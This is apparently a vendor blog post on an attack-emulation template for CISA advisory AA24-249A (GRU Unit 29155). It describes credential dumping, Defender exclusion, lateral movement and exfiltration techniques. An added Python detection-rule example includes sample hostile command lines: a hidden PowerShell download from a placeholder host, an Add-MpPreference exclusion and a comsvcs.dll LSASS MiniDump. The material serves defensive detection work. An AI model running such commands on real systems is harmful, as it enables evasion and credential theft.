Response to CISA Advisory (AA24-249A): Russian Military Cyber Actors Target US and Global Critical Infrastructure

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-249A) published on September 5, 2024, that assesses cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020.

On September 5, 2024, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA), alongside multiple partners, released a Cybersecurity Advisory (CSA) focused on cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who have been responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020.

GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. The analysis of this destructive payload was initially published in the joint advisory AA22-057A released on February 26, 2022.

FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage, influence operations, and assassination attempts throughout Europe. Unit 29155 expanded its tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data.

AttackIQ has released a new assessment template that includes the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by Unit 29155 during its latest activities to help customers validate their security controls and their ability to defend against sophisticated threats.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against the behaviors exhibited by a politically motivated threat that continues to conduct worldwide espionage activities.
  • Assess their security posture against activities focused on espionage, sabotage, and destruction.
  • Continuously validate detection and prevention pipelines against a threat that sustains worldwide espionage and sabotage operations.

[CISA AA24-249A] Russian Military Cyber Actors Target US and Global Critical Infrastructure

This assessment template emulates the post-compromise Tactics, Techniques, and Procedures (TTP) exhibited by Unit 29155 during its latest activities.

The assessment template is divided into tactics, grouping the techniques and implementations used by affiliates at each stage of their activities.

1. Execution

Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.

Process Injection: Process Hollowing (T1055.012): This scenario creates a process in a suspended state and unmaps its memory, which is then replaced with the contents of a malicious executable. In this way, code execution is masked under a legitimate process.

2. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Add-MpPreference PowerShell cmdlet to add a directory to the exclusion list in Microsoft Defender.

3. Credential Access

Consists of techniques for stealing credentials like account names and passwords.

OS Credential Dumping: LSASS Memory (T1003.001): This scenario uses rundll32.exe with comsvcs.dll to create a MiniDump export containing a memory dump of the LSASS process. This process contains a variety of credential material, and the dump can be passed to additional dumping tools to extract credentials.

Pass the Hash (T1550.002): This scenario uses Mimikatz to dump hashed credentials that will be used to authenticate via NTLM to other enterprise resources.

4. Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

Remote System Discovery (T1018): This scenario uses Nmap to scan the local network searching for any remotely accessible systems.

5. Lateral Movement

Consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain access.

Remote Services: SSH (T1021.004): This scenario attempts to open a remote shell and execute commands on target computers using SSH.

6. Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

Ingress Tool Transfer (T1105): This technique is covered by two separate scenarios, one that downloads a payload to memory and one that saves it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

7. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): This scenario compresses an LSASS minidump file and exfiltrates it in unencrypted HTTP traffic to an external server.

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.

  • Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PsExec.
  • Dump SAM hashes with Mimikatz using a Volume Shadow Copy: This scenario retrieves credentials stored in the Security Account Manager (SAM) file using the Volume Shadow Copy Service and Mimikatz.
  • BloodHound Ingestor Execution: This scenario executes a BloodHound ingestor to create a ZIP file containing all the Active Directory data BloodHound needs.
  • Open Port Checker Using Masscan: This scenario uses Masscan to scan the local network searching for any remotely accessible systems.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Command and Scripting Interpreter: PowerShell (T1059.001):

Adversaries may utilize PowerShell scripts and built-in PowerShell cmdlets to complete their primary objectives.

2a. Detection

Enabling PowerShell script logging is critical to being able to track how PowerShell is being used in your environment. Many actors will obfuscate their code to make it more difficult to detect.

Resources for Enabling PowerShell Logging:

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

3. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

3a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
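The signature above, implemented as an added example (not AttackIQ's or CISA's code) in Python over constructed process-creation events of the kind Sysmon Event ID 1 or Security Event 4688 produce. It goes beyond the page's single rule by applying the same process-name-plus-command-line pattern to two other command lines this template emulates, the Add-MpPreference exclusion (T1562.001) and the rundll32.exe/comsvcs.dll MiniDump (T1003.001). The rule names, the ProcessEvent shape and every sample command line are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (assumed shape: image name + full command line)."""
    process_name: str
    command_line: str


@dataclass(frozen=True)
class Rule:
    technique: str
    process_names: frozenset          # lower-cased image names the rule is scoped to
    predicate: Callable[[str], bool]  # receives the lower-cased command line


def _t1105_native_download(cmd: str) -> bool:
    # The page's signature: ("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden".
    # \b around "iwr" stops the short alias from matching inside unrelated words.
    return (bool(re.search(r"\biwr\b|invoke-webrequest", cmd))
            and "downloaddata" in cmd
            and "hidden" in cmd)


def _t1562_defender_exclusion(cmd: str) -> bool:
    # Add-MpPreference -ExclusionPath, as used by the Defense Evasion scenario.
    return "add-mppreference" in cmd and "-exclusionpath" in cmd


def _t1003_comsvcs_minidump(cmd: str) -> bool:
    # rundll32.exe loading comsvcs.dll and calling its MiniDump export.
    return "comsvcs" in cmd and "minidump" in cmd


RULES = [
    Rule("T1105", frozenset({"cmd.exe", "powershell.exe"}), _t1105_native_download),
    Rule("T1562.001", frozenset({"powershell.exe"}), _t1562_defender_exclusion),
    Rule("T1003.001", frozenset({"rundll32.exe"}), _t1003_comsvcs_minidump),
]


def match_rules(event: ProcessEvent) -> List[str]:
    """Return the ATT&CK IDs of every rule the event satisfies."""
    name = event.process_name.lower()
    cmd = event.command_line.lower()
    return [r.technique for r in RULES if name in r.process_names and r.predicate(cmd)]


def evaluate(events) -> List[Tuple[int, str]]:
    """Run all rules over a batch of events; returns (event index, technique) pairs."""
    return [(i, t) for i, ev in enumerate(events) for t in match_rules(ev)]


# Constructed sample events; hosts and paths are placeholders, not real indicators.
SAMPLE_EVENTS = [
    # 0: all three T1105 signature tokens present in a hidden PowerShell window
    ProcessEvent("powershell.exe",
                 "powershell.exe -WindowStyle Hidden -Command \"IWR http://placeholder.invalid/s2; "
                 "(New-Object Net.WebClient).DownloadData('http://placeholder.invalid/s2')\""),
    # 1: the Defender exclusion the template's Defense Evasion scenario adds
    ProcessEvent("powershell.exe",
                 "powershell.exe -Command \"Add-MpPreference -ExclusionPath C:\\Users\\Public\\tools\""),
    # 2: LSASS dump via the comsvcs.dll MiniDump export
    ProcessEvent("rundll32.exe",
                 "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <LSASS-PID> C:\\placeholder\\out.dmp full"),
    # 3: benign hidden-window PowerShell with no download tokens
    ProcessEvent("powershell.exe",
                 "powershell.exe -WindowStyle Hidden -Command \"Get-Process | Out-File C:\\temp\\procs.txt\""),
    # 4: two of the three tokens only; the AND must keep this from firing
    ProcessEvent("cmd.exe", "cmd.exe /c type C:\\temp\\downloaddata_hidden.log"),
]

if __name__ == "__main__":
    for idx, technique in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {technique} -> {SAMPLE_EVENTS[idx].command_line}")
```

Scoping each rule to a process name is what keeps the T1105 signature from firing on the benign hidden-window event and on a command line that happens to contain two of the three tokens; when porting this to a SIEM, keep the process-name condition rather than matching on the command line alone.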

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against this destructive threat. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against sophisticated nation-state actors.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.